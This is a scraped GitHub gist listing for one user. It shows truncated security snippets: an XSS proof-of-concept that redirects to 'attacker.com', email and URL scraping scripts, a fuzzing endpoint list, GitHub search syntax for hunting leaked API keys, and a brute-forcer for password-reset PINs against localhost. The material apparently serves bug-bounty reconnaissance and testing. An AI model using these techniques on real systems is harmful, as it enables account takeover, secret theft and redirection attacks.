Betillø Galvan betillogalvanfbc

betillogalvanfbc / s.js
Created September 29, 2023 19:24
s.js
console.log('XSS Poc!');setTimeout(() => window.location.href = 'https://attacker.com', 5000);
betillogalvanfbc / ee.js
Created September 28, 2023 06:45
extract-emails
(function() {
  const regex = /[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}/g;
  const results = new Set();
  async function fetchAndExtractEmails(url) {
    try {
      const response = await fetch(url);
      const text = await response.text();
      const matches = text.matchAll(regex);
      for (const match of matches) {
betillogalvanfbc / edu.js
Created September 28, 2023 06:44
extract-domains-urls.js
(function() {
  const regexURL = /(https?:\/\/[^\s]+)/g; // Regular expression to extract URLs
  const regexDomain = /https?:\/\/([^\s/]+)/; // Regular expression to extract domains
  const results = new Set();
  async function fetchAndExtractUrls(url) {
    try {
      const response = await fetch(url);
      const text = await response.text();
      const matches = text.matchAll(regexURL);
betillogalvanfbc / List of API endpoints & objects
Created September 19, 2023 21:58 — forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

for (e in frames) {
  console.log(e)
}
for (e in window) {
  try {
    if (window[e].hasOwnProperty('top') && window[e]['top'] === window) {
      console.log(e)
    }
  } catch (err) {}
}
betillogalvanfbc / main.js
Last active April 8, 2023 05:24
main.js
console.log('error');
betillogalvanfbc / bruteforcepin.py
Created February 2, 2023 20:37
bruteforcepin.py
import asyncio
import aiohttp
async def crack_pin(prefix, session):
    for i in range(10000):
        pin = prefix + str(i).zfill(4)
        async with session.post("http://localhost/resetpassword", data={"pin": pin}) as resp:
            if resp.status == 200:
                return pin
        await asyncio.sleep(0.01)
betillogalvanfbc / linkPreviewGenerator.js
Created January 23, 2023 21:38
linkPreviewGenerator.js
const linkPreviewGenerator = require("link-preview-generator");
async function run() {
  const previewData = await linkPreviewGenerator("url");
  console.log(previewData);
}
run();